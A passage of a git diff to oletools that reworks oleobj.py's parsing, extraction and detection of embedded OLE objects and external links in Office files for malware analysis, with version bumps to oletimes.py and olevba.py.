+ value = STRUCT_UINT16.unpack(data[index:index+2])[0]
+ index += 2
+ return (value, index)
-def read_LengthPrefixedAnsiString(data):
+def read_length_prefixed_string(data, index):
"""
Read a length-prefixed ANSI string from data.
- :param data: bytes string containing the data to be extracted.
- :return: tuple (value, new_data) containing the read value (bytes string),
- and the new data without the bytes read.
+ :param data: bytes string or stream containing the data to be extracted.
+ :param index: index in data where string size start or None if data is
+ stream
+ :return: tuple (value, index) containing the read value (bytes string),
+ and the index to start reading from next time.
"""
- length, data = read_uint32(data)
+ length, index = read_uint32(data, index)
# if length = 0, return a null string (no null character)
if length == 0:
- return ('', data)
+ return ('', index)
# extract the string without the last null character
- ansi_string = data[:length-1]
+ if index is None:
+ ansi_string = data.read(length-1)
+ null_char = data.read(1)
+ else:
+ ansi_string = data[index:index+length-1]
+ null_char = data[index+length-1]
+ index += length
# TODO: only in strict mode:
# check the presence of the null char:
- assert data[length] == NULL_CHAR
- new_data = data[length:]
- return (ansi_string, new_data)
+ assert null_char == NULL_CHAR
+ return (ansi_string, index)
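The LengthPrefixedAnsiString format (MS-OLEDS) stores a uint32 length that includes the terminating null byte, which is why the code above reads `length-1` bytes and then checks for the null. A buffer-only sketch of the same layout (`read_lp_ansi` is a hypothetical name):

```python
import struct

def read_lp_ansi(data, index):
    # uint32 length prefix; the count includes the final null byte
    (length,) = struct.unpack_from('<L', data, index)
    index += 4
    if length == 0:
        return b'', index                 # zero length: null string, no null char
    value = data[index:index + length - 1]
    # the last counted byte must be the string terminator
    assert data[index + length - 1:index + length] == b'\x00'
    return value, index + length

buf = struct.pack('<L', 6) + b'Excel\x00'
value, index = read_lp_ansi(buf, 0)
print(value, index)   # b'Excel' 10
```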
-# === CLASSES ================================================================
+def guess_encoding(data):
+ """ guess encoding of byte string to create unicode
-class OleNativeStream (object):
+ Since this is used to decode path names from ole objects, prefer latin1
+ over utf* codecs if ascii is not enough
+ """
+ for encoding in 'ascii', 'latin1', 'utf8', 'utf-16-le', 'utf16':
+ try:
+ result = data.decode(encoding, errors='strict')
+ log.debug(u'decoded using {0}: "{1}"'.format(encoding, result))
+ return result
+ except UnicodeError:
+ pass
+ log.warning('failed to guess encoding for string, falling back to '
+ 'ascii with replace')
+ return data.decode('ascii', errors='replace')
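The fallback chain can be exercised in isolation. Note that latin1 can decode any byte string, so in practice it stops the chain before the utf* codecs ever run; they would only matter if latin1 were removed from the list. A sketch:

```python
def guess_encoding(data):
    # try the strictest codec first; latin1 accepts all 256 byte values,
    # so it effectively ends the chain before the utf* codecs
    for encoding in ('ascii', 'latin1', 'utf8', 'utf-16-le', 'utf16'):
        try:
            return data.decode(encoding, errors='strict')
        except UnicodeError:
            pass
    return data.decode('ascii', errors='replace')

print(guess_encoding(b'evil.exe'))      # 'evil.exe' (ascii is enough)
print(guess_encoding(b'r\xe9sum\xe9'))  # decoded as latin1
```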
+
+
+def read_zero_terminated_string(data, index):
+ """
+ Read a zero-terminated string from data
+
+ :param data: bytes string or stream containing an ansi string
+ :param index: index at which the string should start or None if data is
+ stream
+ :return: tuple (unicode, index) containing the read string (unicode),
+ and the index to start reading from next time.
+ """
+ if index is None:
+ result = bytearray()
+ for _ in xrange(STR_MAX_LEN):
+ char = ord(data.read(1)) # need ord() for py3
+ if char == 0:
+ return guess_encoding(result), index
+ result.append(char)
+ raise ValueError('found no string-terminating zero-byte!')
+ else: # data is byte array, can just search
+ end_idx = data.index(b'\x00', index, index+STR_MAX_LEN)
+ # encode and return with index after the 0-byte
+ return guess_encoding(data[index:end_idx]), end_idx+1
+
+
+# === CLASSES =================================================================
+
+
+class OleNativeStream(object):
"""
OLE object contained into an OLENativeStream structure.
(see MS-OLEDS 2.3.6 OLENativeStream)
+
+ Filename and paths are decoded to unicode.
"""
# constants for the type attribute:
# see MS-OLEDS 2.2.4 ObjectHeader
TYPE_LINKED = 0x01
TYPE_EMBEDDED = 0x02
-
def __init__(self, bindata=None, package=False):
"""
Constructor for OleNativeStream.
If bindata is provided, it will be parsed using the parse() method.
- :param bindata: bytes, OLENativeStream structure containing an OLE object
- :param package: bool, set to True when extracting from an OLE Package object
+ :param bindata: forwarded to parse, see docu there
+ :param package: bool, set to True when extracting from an OLE Package
+ object
"""
self.filename = None
self.src_path = None
@@ -238,6 +366,8 @@ def __init__(self, bindata=None, package=False):
self.actual_size = None
self.data = None
self.package = package
+ self.is_link = None
+ self.data_is_stream = None
if bindata is not None:
self.parse(data=bindata)
@@ -247,34 +377,52 @@ def parse(self, data):
to extract the OLE object it contains.
(see MS-OLEDS 2.3.6 OLENativeStream)
- :param data: bytes, OLENativeStream structure containing an OLE object
- :return:
+ :param data: bytes array or stream, containing OLENativeStream
+ structure containing an OLE object
+ :return: None
"""
# TODO: strict mode to raise exceptions when values are incorrect
# (permissive mode by default)
+ if hasattr(data, 'read'):
+ self.data_is_stream = True
+ index = None # marker for read_* functions to expect stream
+ else:
+ self.data_is_stream = False
+ index = 0 # marker for read_* functions to expect array
+
# An OLE Package object does not have the native data size field
if not self.package:
- self.native_data_size = struct.unpack('<L', data[0:4])[0]
- data = data[4:]
- log.debug('OLE native data size = {0:08X} ({0} bytes)'.format(self.native_data_size))
+ self.native_data_size, index = read_uint32(data, index)
+ log.debug('OLE native data size = {0:08X} ({0} bytes)'
+ .format(self.native_data_size))
# I thought this might be an OLE type specifier ???
- self.type, data = read_uint16(data)
- self.filename, data = data.split(b'\x00', 1)
+ self.type, index = read_uint16(data, index)
+ self.filename, index = read_zero_terminated_string(data, index)
# source path
- self.src_path, data = data.split(b'\x00', 1)
- # TODO: I bet these 8 bytes are a timestamp ==> FILETIME from olefile
- self.unknown_long_1, data = read_uint32(data)
- self.unknown_long_2, data = read_uint32(data)
+ self.src_path, index = read_zero_terminated_string(data, index)
+ # TODO: I bet these 8 bytes are a timestamp ==> FILETIME from olefile
+ self.unknown_long_1, index = read_uint32(data, index)
+ self.unknown_long_2, index = read_uint32(data, index)
# temp path?
- self.temp_path, data = data.split(b'\x00', 1)
+ self.temp_path, index = read_zero_terminated_string(data, index)
# size of the rest of the data
- self.actual_size, data = read_uint32(data)
- self.data = data[0:self.actual_size]
- # TODO: exception when size > remaining data
- # TODO: SLACK DATA
-
-
-class OleObject (object):
+ try:
+ self.actual_size, index = read_uint32(data, index)
+ if self.data_is_stream:
+ self.data = data
+ else:
+ self.data = data[index:index+self.actual_size]
+ self.is_link = False
+ # TODO: there can be extra data, no idea what it is for
+ # TODO: SLACK DATA
+ except (IOError, struct.error): # no data to read actual_size
+ log.debug('data is not embedded but only a link')
+ self.is_link = True
+ self.actual_size = 0
+ self.data = None
+
+
+class OleObject(object):
"""
OLE 1.0 Object
@@ -286,13 +434,15 @@ class OleObject (object):
TYPE_LINKED = 0x01
TYPE_EMBEDDED = 0x02
-
def __init__(self, bindata=None):
"""
Constructor for OleObject.
If bindata is provided, it will be parsed using the parse() method.
- :param bindata: bytes, OLE 1.0 Object structure containing an OLE object
+ :param bindata: bytes, OLE 1.0 Object structure containing OLE object
+
+ Note: Code can easily be generalized to work with byte streams instead
+ of arrays just like in OleNativeStream.
"""
self.ole_version = None
self.format_id = None
@@ -301,6 +451,8 @@ def __init__(self, bindata=None):
self.item_name = None
self.data = None
self.data_size = None
+ if bindata is not None:
+ self.parse(bindata)
def parse(self, data):
"""
@@ -315,32 +467,35 @@ def parse(self, data):
# print("Parsing OLE object data:")
# print(hexdump3(data, length=16))
# Header: see MS-OLEDS 2.2.4 ObjectHeader
- self.ole_version, data = read_uint32(data)
- self.format_id, data = read_uint32(data)
- log.debug('OLE version=%08X - Format ID=%08X' % (self.ole_version, self.format_id))
+ index = 0
+ self.ole_version, index = read_uint32(data, index)
+ self.format_id, index = read_uint32(data, index)
+ log.debug('OLE version=%08X - Format ID=%08X',
+ self.ole_version, self.format_id)
assert self.format_id in (self.TYPE_EMBEDDED, self.TYPE_LINKED)
- self.class_name, data = read_LengthPrefixedAnsiString(data)
- self.topic_name, data = read_LengthPrefixedAnsiString(data)
- self.item_name, data = read_LengthPrefixedAnsiString(data)
- log.debug('Class name=%r - Topic name=%r - Item name=%r'
- % (self.class_name, self.topic_name, self.item_name))
+ self.class_name, index = read_length_prefixed_string(data, index)
+ self.topic_name, index = read_length_prefixed_string(data, index)
+ self.item_name, index = read_length_prefixed_string(data, index)
+ log.debug('Class name=%r - Topic name=%r - Item name=%r',
+ self.class_name, self.topic_name, self.item_name)
if self.format_id == self.TYPE_EMBEDDED:
# Embedded object: see MS-OLEDS 2.2.5 EmbeddedObject
- #assert self.topic_name != '' and self.item_name != ''
- self.data_size, data = read_uint32(data)
- log.debug('Declared data size=%d - remaining size=%d' % (self.data_size, len(data)))
+ # assert self.topic_name != '' and self.item_name != ''
+ self.data_size, index = read_uint32(data, index)
+ log.debug('Declared data size=%d - remaining size=%d',
+ self.data_size, len(data)-index)
# TODO: handle incorrect size to avoid exception
- self.data = data[:self.data_size]
+ self.data = data[index:index+self.data_size]
assert len(self.data) == self.data_size
- self.extra_data = data[self.data_size:]
-
+ self.extra_data = data[index+self.data_size:]
def sanitize_filename(filename, replacement='_', max_length=200):
"""compute basename of filename. Replaces all non-whitelisted characters.
- The returned filename is always a basename of the file."""
+ The returned filename is always an ascii basename of the file."""
basepath = os.path.basename(filename).strip()
- sane_fname = re.sub(r'[^\w\.\- ]', replacement, basepath)
+ sane_fname = re.sub(u'[^a-zA-Z0-9.\\-_ ]', replacement, basepath)
+ sane_fname = str(sane_fname) # py3: does nothing; py2: unicode --> str
while ".." in sane_fname:
sane_fname = sane_fname.replace('..', '.')
@@ -348,7 +503,7 @@ def sanitize_filename(filename, replacement='_', max_length=200):
while " " in sane_fname:
sane_fname = sane_fname.replace(' ', ' ')
- if not len(filename):
+ if not filename:
sane_fname = 'NONAME'
# limit filename length
@@ -358,10 +513,227 @@ def sanitize_filename(filename, replacement='_', max_length=200):
return sane_fname
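The stricter ascii whitelist can be tried directly; a condensed sketch of the same steps (basename, whitelist substitution, collapsing `..` and double spaces):

```python
import os
import re

def sanitize_filename(filename, replacement='_', max_length=200):
    # basename first, so path separators can never escape the output dir
    sane = re.sub(r'[^a-zA-Z0-9.\-_ ]', replacement,
                  os.path.basename(filename).strip())
    while '..' in sane:   # collapse runs of dots
        sane = sane.replace('..', '.')
    while '  ' in sane:   # collapse runs of spaces
        sane = sane.replace('  ', ' ')
    if not filename:
        sane = 'NONAME'
    return sane[:max_length]

print(sanitize_filename('../../etc/passwd'))  # 'passwd'
print(sanitize_filename('bad:name?.docx'))    # 'bad_name_.docx'
```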
-def process_file(container, filename, data, output_dir=None):
+def find_ole_in_ppt(filename):
+ """ find ole streams in ppt
+
+ This may be a bit confusing: we get an ole file (or its name) as input and
+ as output we produce possibly several ole files. This is because the
+ data structure can be pretty nested:
+ A ppt file has many streams that consist of records. Some of these records
+ can contain the data of another complete ole file (which
+ we yield). This embedded ole file can have several streams, one of which
+ can contain the actual embedded file we are looking for (caller will check
+ for these).
+ """
+ ppt_file = None
+ try:
+ ppt_file = PptFile(filename)
+ for stream in ppt_file.iter_streams():
+ for record_idx, record in enumerate(stream.iter_records()):
+ if isinstance(record, PptRecordExOleVbaActiveXAtom):
+ ole = None
+ try:
+ data_start = next(record.iter_uncompressed())
+ if data_start[:len(olefile.MAGIC)] != olefile.MAGIC:
+ continue # could be ActiveX control / VBA Storage
+
+ # otherwise, this should be an OLE object
+ log.debug('Found record with embedded ole object in '
+ 'ppt (stream "{0}", record no {1})'
+ .format(stream.name, record_idx))
+ ole = record.get_data_as_olefile()
+ yield ole
+ except IOError:
+ log.warning('Error reading data from {0} stream or '
+ 'interpreting it as OLE object'
+ .format(stream.name))
+ log.debug('', exc_info=True)
+ finally:
+ if ole is not None:
+ ole.close()
+ finally:
+ if ppt_file is not None:
+ ppt_file.close()
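find_ole_in_ppt relies on try/finally inside a generator so that every handle is closed even if the consumer stops iterating early. The pattern in isolation (Resource is a stand-in class, not part of oletools):

```python
closed = []

class Resource(object):
    """stand-in for an ole/ppt file handle"""
    def __init__(self, name):
        self.name = name
    def close(self):
        closed.append(self.name)

def iter_resources(names):
    outer = Resource('container')    # like the enclosing PptFile
    try:
        for name in names:
            item = Resource(name)    # like each embedded ole file
            try:
                yield item
            finally:
                item.close()         # runs even on break or exception
    finally:
        outer.close()                # runs when the generator finishes

for res in iter_resources(['a', 'b']):
    pass
print(closed)   # ['a', 'b', 'container']
```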
+
+
+class FakeFile(io.RawIOBase):
+ """ create file-like object from data without copying it
+
+ BytesIO is what I would like to use but it copies all the data. This class
+ does not. On the downside: data can only be read and seeked, not written.
+
+ Assume that given data is bytes (str in py2, bytes in py3).
+
+ See also (and maybe can put into common file with):
+ ppt_record_parser.IterStream, ooxml.ZipSubFile
+ """
+
+ def __init__(self, data):
+ """ create FakeFile with given bytes data """
+ super(FakeFile, self).__init__()
+ self.data = data # this does not actually copy (python is lazy)
+ self.pos = 0
+ self.size = len(data)
+
+ def readable(self):
+ return True
+
+ def writable(self):
+ return False
+
+ def seekable(self):
+ return True
+
+ def readinto(self, target):
+ """ read into pre-allocated target """
+ n_data = min(len(target), self.size-self.pos)
+ if n_data == 0:
+ return 0
+ target[:n_data] = self.data[self.pos:self.pos+n_data]
+ self.pos += n_data
+ return n_data
+
+ def read(self, n_data=-1):
+ """ read and return data """
+ if self.pos >= self.size:
+ return bytes()
+ if n_data == -1:
+ n_data = self.size - self.pos
+ result = self.data[self.pos:self.pos+n_data]
+ self.pos += n_data
+ return result
+
+ def seek(self, pos, offset=io.SEEK_SET):
+ """ jump to another position in file """
+ # calc target position from self.pos, pos and offset
+ if offset == io.SEEK_SET:
+ new_pos = pos
+ elif offset == io.SEEK_CUR:
+ new_pos = self.pos + pos
+ elif offset == io.SEEK_END:
+ new_pos = self.size + pos
+ else:
+ raise ValueError("invalid offset {0}, need SEEK_* constant"
+ .format(offset))
+ if new_pos < 0:
+ raise IOError('Seek beyond start of file not allowed')
+ self.pos = new_pos
+
+ def tell(self):
+ """ tell where in file we are positioned """
+ return self.pos
+
+
+def find_ole(filename, data, xml_parser=None):
+ """ try to open somehow as zip/ole/rtf/... ; yield None if fail
+
+ If data is given, filename is (mostly) ignored.
+
+ yields embedded ole streams in form of OleFileIO.
+ """
+
+ if data is not None:
+ # isOleFile and is_ppt can work on data directly but zip need file
+ # --> wrap data in a file-like object without copying data
+ log.debug('working on data, file is not touched below')
+ arg_for_ole = data
+ arg_for_zip = FakeFile(data)
+ else:
+ # we only have a file name
+ log.debug('working on file by name')
+ arg_for_ole = filename
+ arg_for_zip = filename
+
+ ole = None
+ try:
+ if olefile.isOleFile(arg_for_ole):
+ if is_ppt(arg_for_ole):
+ log.info('is ppt file: ' + filename)
+ for ole in find_ole_in_ppt(arg_for_ole):
+ yield ole
+ ole = None # is closed in find_ole_in_ppt
+ # in any case: check for embedded stuff in non-sectored streams
+ log.info('is ole file: ' + filename)
+ ole = olefile.OleFileIO(arg_for_ole)
+ yield ole
+ elif xml_parser is not None or is_zipfile(arg_for_zip):
+ # keep compatibility with 3rd-party code that calls this function
+ # directly without providing an XmlParser instance
+ if xml_parser is None:
+ xml_parser = XmlParser(arg_for_zip)
+ # force iteration so XmlParser.iter_non_xml() returns data
+ [x for x in xml_parser.iter_xml()]
+
+ log.info('is zip file: ' + filename)
+ # we looped through the XML files before, now we can
+ # iterate the non-XML files looking for ole objects
+ for subfile, _, file_handle in xml_parser.iter_non_xml():
+ try:
+ head = file_handle.read(len(olefile.MAGIC))
+ except RuntimeError:
+ log.error('zip is encrypted: ' + filename)
+ yield None
+ continue
+
+ if head == olefile.MAGIC:
+ file_handle.seek(0)
+ log.info(' unzipping ole: ' + subfile)
+ try:
+ ole = olefile.OleFileIO(file_handle)
+ yield ole
+ except IOError:
+ log.warning('Error reading data from {0}/{1} or '
+ 'interpreting it as OLE object'
+ .format(filename, subfile))
+ log.debug('', exc_info=True)
+ finally:
+ if ole is not None:
+ ole.close()
+ ole = None
+ else:
+ log.debug('unzip skip: ' + subfile)
+ else:
+ log.warning('open failed: {0} (or its data) is neither zip nor OLE'
+ .format(filename))
+ yield None
+ except Exception:
+ log.error('Caught exception opening {0}'.format(filename),
+ exc_info=True)
+ yield None
+ finally:
+ if ole is not None:
+ ole.close()
+
+
+def find_external_relationships(xml_parser):
+ """ iterate XML files looking for relationships to external objects
+ """
+ for _, elem, _ in xml_parser.iter_xml(None, False, OOXML_RELATIONSHIP_TAG):
+ try:
+ if elem.attrib['TargetMode'] == 'External':
+ relationship_type = elem.attrib['Type'].rsplit('/', 1)[1]
+
+ if relationship_type in BLACKLISTED_RELATIONSHIP_TYPES:
+ yield relationship_type, elem.attrib['Target']
+ except (AttributeError, KeyError):
+ # ignore missing attributes - Word won't detect
+ # external links anyway
+ pass
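The relationship scan can be reproduced with plain ElementTree on a `.rels` document; the XML below is a made-up sample, while the tag constant matches OOXML_RELATIONSHIP_TAG above:

```python
import xml.etree.ElementTree as ET

RELS_XML = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/'
    'package/2006/relationships">'
    '<Relationship Id="rId1" TargetMode="External"'
    ' Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/attachedTemplate"'
    ' Target="http://example.com/template.dotm"/>'
    '</Relationships>'
)
TAG = ('{http://schemas.openxmlformats.org/package/2006/relationships}'
       'Relationship')

for elem in ET.fromstring(RELS_XML).iter(TAG):
    if elem.attrib.get('TargetMode') == 'External':
        # last path component of Type is the relationship type
        rel_type = elem.attrib['Type'].rsplit('/', 1)[1]
        print(rel_type, elem.attrib['Target'])
```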
+
+
+def process_file(filename, data, output_dir=None):
+ """ find embedded objects in given file
+
+ if data is given (from xglob for encrypted zip files), then filename is
+ not used for reading. If not (usual case), then data is read from filename
+ on demand.
+
+ If output_dir is given and does not exist, it is created. If it is not
+ given, data is saved to the same directory as the input file.
+ """
if output_dir:
if not os.path.isdir(output_dir):
- log.info('creating output directory %s' % output_dir)
+ log.info('creating output directory %s', output_dir)
os.mkdir(output_dir)
fname_prefix = os.path.join(output_dir,
@@ -372,78 +744,161 @@ def process_file(container, filename, data, output_dir=None):
fname_prefix = os.path.join(base_dir, sane_fname)
# TODO: option to extract objects to files (false by default)
- if data is None:
- data = open(filename, 'rb').read()
- print ('-'*79)
- print ('File: %r - %d bytes' % (filename, len(data)))
- ole = olefile.OleFileIO(data)
+ print('-'*79)
+ print('File: %r' % filename)
index = 1
- for stream in ole.listdir():
- if stream[-1] == '\x01Ole10Native':
- objdata = ole.openstream(stream).read()
- stream_path = '/'.join(stream)
- log.debug('Checking stream %r' % stream_path)
- try:
- print('extract file embedded in OLE object from stream %r:' % stream_path)
- print ('Parsing OLE Package')
- opkg = OleNativeStream(bindata=objdata)
- print ('Filename = %r' % opkg.filename)
- print ('Source path = %r' % opkg.src_path)
- print ('Temp path = %r' % opkg.temp_path)
+
+ # do not throw errors but remember them and try to continue with other streams
+ err_stream = False
+ err_dumping = False
+ did_dump = False
+
+ xml_parser = None
+ if is_zipfile(filename):
+ log.info('file could be an OOXML file, looking for relationships with '
+ 'external links')
+ xml_parser = XmlParser(filename)
+ for relationship, target in find_external_relationships(xml_parser):
+ did_dump = True
+ print("Found relationship '%s' with external link %s" % (relationship, target))
+
+ # look for ole files inside file (e.g. unzip docx)
+ # have to finish work on every ole stream inside iteration, since handles
+ # are closed in find_ole
+ for ole in find_ole(filename, data, xml_parser):
+ if ole is None: # no ole file found
+ continue
+
+ for path_parts in ole.listdir():
+ stream_path = '/'.join(path_parts)
+ log.debug('Checking stream %r', stream_path)
+ if path_parts[-1].lower() == '\x01ole10native':
+ stream = None
+ try:
+ stream = ole.openstream(path_parts)
+ print('extract file embedded in OLE object from stream %r:'
+ % stream_path)
+ print('Parsing OLE Package')
+ opkg = OleNativeStream(stream)
+ # leave stream open until dumping is finished
+ except Exception:
+ log.warning('*** Not an OLE 1.0 Object')
+ err_stream = True
+ if stream is not None:
+ stream.close()
+ continue
+
+ # print info
+ if opkg.is_link:
+ log.debug('Object is not embedded but only linked to '
+ '- skip')
+ continue
+ print(u'Filename = "%s"' % opkg.filename)
+ print(u'Source path = "%s"' % opkg.src_path)
+ print(u'Temp path = "%s"' % opkg.temp_path)
if opkg.filename:
fname = '%s_%s' % (fname_prefix,
sanitize_filename(opkg.filename))
else:
fname = '%s_object_%03d.noname' % (fname_prefix, index)
- print ('saving to file %s' % fname)
- open(fname, 'wb').write(opkg.data)
+
+ # dump
+ try:
+ print('saving to file %s' % fname)
+ with open(fname, 'wb') as writer:
+ n_dumped = 0
+ next_size = min(DUMP_CHUNK_SIZE, opkg.actual_size)
+ while next_size:
+ data = stream.read(next_size)
+ writer.write(data)
+ n_dumped += len(data)
+ if len(data) != next_size:
+ log.warning('Wanted to read {0}, got {1}'
+ .format(next_size, len(data)))
+ break
+ next_size = min(DUMP_CHUNK_SIZE,
+ opkg.actual_size - n_dumped)
+ did_dump = True
+ except Exception as exc:
+ log.warning('error dumping to {0} ({1})'
+ .format(fname, exc))
+ err_dumping = True
+ finally:
+ stream.close()
+
index += 1
- except:
- log.debug('*** Not an OLE 1.0 Object')
+ return err_stream, err_dumping, did_dump
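The chunked dump loop added above can be sketched in isolation. This is a minimal stand-in, assuming an in-memory stream instead of an OLE stream handle; `dump_stream` is a hypothetical helper name, and `DUMP_CHUNK_SIZE` is set artificially small for illustration:

```python
from io import BytesIO

DUMP_CHUNK_SIZE = 4  # tiny value for illustration; oleobj uses a much larger chunk size

def dump_stream(stream, actual_size):
    """Copy at most actual_size bytes from stream, reading in fixed-size chunks.

    Mirrors the dump loop above: if the stream yields fewer bytes than
    requested (a truncated stream), stop early instead of raising.
    """
    out = bytearray()
    n_dumped = 0
    next_size = min(DUMP_CHUNK_SIZE, actual_size)
    while next_size:
        chunk = stream.read(next_size)
        out.extend(chunk)
        n_dumped += len(chunk)
        if len(chunk) != next_size:
            break  # stream ended earlier than actual_size announced
        next_size = min(DUMP_CHUNK_SIZE, actual_size - n_dumped)
    return bytes(out)

print(dump_stream(BytesIO(b'abcdefghij'), 7))  # b'abcdefg'
```

Reading in bounded chunks keeps memory use constant even for very large embedded objects, which is why the loop tracks `n_dumped` instead of calling `stream.read()` once.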
+# === MAIN ====================================================================
-#=== MAIN =================================================================
-def main():
- # print banner with version
- print ('oleobj %s - http://decalage.info/oletools' % __version__)
- print ('THIS IS WORK IN PROGRESS - Check updates regularly!')
- print ('Please report any issue at https://github.com/decalage2/oletools/issues')
- print ('')
+def existing_file(filename):
+ """ called by argument parser to see whether given file exists """
+ if not os.path.isfile(filename):
+ raise argparse.ArgumentTypeError('{0} is not a file.'.format(filename))
+ return filename
- DEFAULT_LOG_LEVEL = "warning" # Default log level
- LOG_LEVELS = {'debug': logging.DEBUG,
- 'info': logging.INFO,
- 'warning': logging.WARNING,
- 'error': logging.ERROR,
- 'critical': logging.CRITICAL
- }
- usage = 'usage: %prog [options] [filename2 ...]'
- parser = optparse.OptionParser(usage=usage)
- # parser.add_option('-o', '--outfile', dest='outfile',
+def main(cmd_line_args=None):
+ """ main function, called when running this as script
+
+ Per default (cmd_line_args=None) uses sys.argv. For testing, however, can
+ provide other arguments.
+ """
+ # print banner with version
+ ensure_stdout_handles_unicode()
+ print('oleobj %s - http://decalage.info/oletools' % __version__)
+ print('THIS IS WORK IN PROGRESS - Check updates regularly!')
+ print('Please report any issue at '
+ 'https://github.com/decalage2/oletools/issues')
+ print('')
+
+ usage = 'usage: %(prog)s [options] [filename2 ...]'
+ parser = argparse.ArgumentParser(usage=usage)
+ # parser.add_argument('-o', '--outfile', dest='outfile',
# help='output file')
- # parser.add_option('-c', '--csv', dest='csv',
+ # parser.add_argument('-c', '--csv', dest='csv',
# help='export results to a CSV file')
- parser.add_option("-r", action="store_true", dest="recursive",
- help='find files recursively in subdirectories.')
- parser.add_option("-d", type="str", dest="output_dir",
- help='use specified directory to output files.', default=None)
- parser.add_option("-z", "--zip", dest='zip_password', type='str', default=None,
- help='if the file is a zip archive, open first file from it, using the provided password (requires Python 2.6+)')
- parser.add_option("-f", "--zipfname", dest='zip_fname', type='str', default='*',
- help='if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)')
- parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
- help="logging level debug/info/warning/error/critical (default=%default)")
-
- (options, args) = parser.parse_args()
+ parser.add_argument("-r", action="store_true", dest="recursive",
+ help='find files recursively in subdirectories.')
+ parser.add_argument("-d", type=str, dest="output_dir", default=None,
+ help='use specified directory to output files.')
+ parser.add_argument("-z", "--zip", dest='zip_password', type=str,
+ default=None,
+ help='if the file is a zip archive, open first file '
+ 'from it, using the provided password (requires '
+ 'Python 2.6+)')
+ parser.add_argument("-f", "--zipfname", dest='zip_fname', type=str,
+ default='*',
+ help='if the file is a zip archive, file(s) to be '
+ 'opened within the zip. Wildcards * and ? are '
+ 'supported. (default:*)')
+ parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
+ default=DEFAULT_LOG_LEVEL,
+ help='logging level debug/info/warning/error/critical '
+ '(default=%(default)s)')
+ parser.add_argument('input', nargs='*', type=existing_file, metavar='FILE',
+ help='Office files to parse (same as -i)')
+
+ # options for compatibility with ripOLE
+ parser.add_argument('-i', '--more-input', type=str, metavar='FILE',
+ help='Additional file to parse (same as positional '
+ 'arguments)')
+ parser.add_argument('-v', '--verbose', action='store_true',
+ help='verbose mode, set logging to DEBUG '
+ '(overwrites -l)')
+
+ options = parser.parse_args(cmd_line_args)
+ if options.more_input:
+ options.input += [options.more_input, ]
+ if options.verbose:
+ options.loglevel = 'debug'
# Print help if no arguments are passed
- if len(args) == 0:
- print (__doc__)
+ if not options.input:
parser.print_help()
- sys.exit()
+ return RETURN_ERR_ARGS
# Setup logging to the console:
# here we use stdout instead of stderr by default, so that the output
@@ -452,15 +907,37 @@ def main():
format='%(levelname)-8s %(message)s')
# enable logging in the modules:
log.setLevel(logging.NOTSET)
-
-
- for container, filename, data in xglob.iter_files(args, recursive=options.recursive,
- zip_password=options.zip_password, zip_fname=options.zip_fname):
+ if options.loglevel == 'debug-olefile':
+ olefile.enable_logging()
+
+ # remember if there was a problem and continue with other data
+ any_err_stream = False
+ any_err_dumping = False
+ any_did_dump = False
+
+ for container, filename, data in \
+ xglob.iter_files(options.input, recursive=options.recursive,
+ zip_password=options.zip_password,
+ zip_fname=options.zip_fname):
# ignore directory names stored in zip files:
if container and filename.endswith('/'):
continue
- process_file(container, filename, data, options.output_dir)
+ err_stream, err_dumping, did_dump = \
+ process_file(filename, data, options.output_dir)
+ any_err_stream |= err_stream
+ any_err_dumping |= err_dumping
+ any_did_dump |= did_dump
+
+ # assemble return value
+ return_val = RETURN_NO_DUMP
+ if any_did_dump:
+ return_val += RETURN_DID_DUMP
+ if any_err_stream:
+ return_val += RETURN_ERR_STREAM
+ if any_err_dumping:
+ return_val += RETURN_ERR_DUMP
+ return return_val
-if __name__ == '__main__':
- main()
+if __name__ == '__main__':
+ sys.exit(main())
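The return-value assembly at the end of `main()` adds independent flags together so a caller can decode several outcomes from one exit code. A minimal sketch of that scheme (the constant names match the `RETURN_*` identifiers used above, but the exact values here are assumptions for illustration):

```python
# Assumed flag values: each condition gets its own bit so combinations are unambiguous.
RETURN_NO_DUMP = 0
RETURN_DID_DUMP = 1
RETURN_ERR_STREAM = 2
RETURN_ERR_DUMP = 4

def assemble_return_value(any_did_dump, any_err_stream, any_err_dumping):
    """Combine per-file outcome flags into one additive exit code, as in main()."""
    return_val = RETURN_NO_DUMP
    if any_did_dump:
        return_val += RETURN_DID_DUMP
    if any_err_stream:
        return_val += RETURN_ERR_STREAM
    if any_err_dumping:
        return_val += RETURN_ERR_DUMP
    return return_val

print(assemble_return_value(True, True, False))  # 3
```

With distinct bits, a shell script can test individual conditions (`exit_code & 2` for stream errors) rather than matching one opaque number.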
diff --git a/oletools/oletimes.py b/oletools/oletimes.py
index a00ce3d4..5d7809a2 100644
--- a/oletools/oletimes.py
+++ b/oletools/oletimes.py
@@ -16,7 +16,7 @@
#=== LICENSE =================================================================
-# oletimes is copyright (c) 2013-2017, Philippe Lagadec (http://www.decalage.info)
+# oletimes is copyright (c) 2013-2019, Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -50,8 +50,9 @@
# 2016-09-05 PL: - added main entry point for setup.py
# 2017-05-03 v0.51 PL: - fixed absolute imports (issue #141)
# 2017-05-04 PL: - added optparse and xglob (issue #141)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -75,7 +76,7 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
+import olefile
from oletools.thirdparty import xglob
from oletools.thirdparty.prettytable import prettytable
diff --git a/oletools/olevba.py b/oletools/olevba.py
index 67d42ca8..dbb5ffe7 100644
--- a/oletools/olevba.py
+++ b/oletools/olevba.py
@@ -5,14 +5,20 @@
olevba is a script to parse OLE and OpenXML files such as MS Office documents
(e.g. Word, Excel), to extract VBA Macro code in clear text, deobfuscate
and analyze malicious macros.
+XLM/Excel 4 Macros are also supported in Excel and SLK files.
Supported formats:
-- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
-- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
-- Word 2003 XML (.xml)
-- Word/Excel Single File Web Page / MHTML (.mht)
-- Publisher (.pub)
+ - Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
